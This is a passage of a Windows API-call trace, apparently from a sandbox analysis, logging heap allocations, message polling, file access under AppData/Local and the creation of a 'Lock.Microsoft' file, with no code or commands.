hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.881] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0168.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0168.882] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Microsoft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0168.882] GetLastError () returned 0x5 [0168.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0168.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0168.883] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0168.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0168.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0168.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0168.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0168.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0168.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0168.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0168.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0168.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0168.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0168.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0168.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.884] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0168.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0168.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0168.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0168.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0168.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0168.884] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.Microsoft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4e0 [0168.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fa0 [0168.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0168.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0168.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0168.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0168.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0168.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0168.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0168.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0168.885] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0168.886] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0168.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0168.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0168.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0168.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0168.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0168.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0168.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0168.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0168.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.887] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0168.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0168.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0168.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0168.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0168.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0168.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0168.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0168.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0168.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0168.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0168.888] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0168.888] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0168.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0168.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0168.888] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0168.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72348 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0168.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0168.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa930 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0168.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0168.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0168.889] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0168.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0168.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0168.890] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a724f8 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72508 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0168.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0168.890] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0168.890] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0168.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0168.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0168.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0168.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0168.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0168.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0168.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0168.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0168.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0168.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0168.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0168.891] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0168.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0168.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0168.891] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 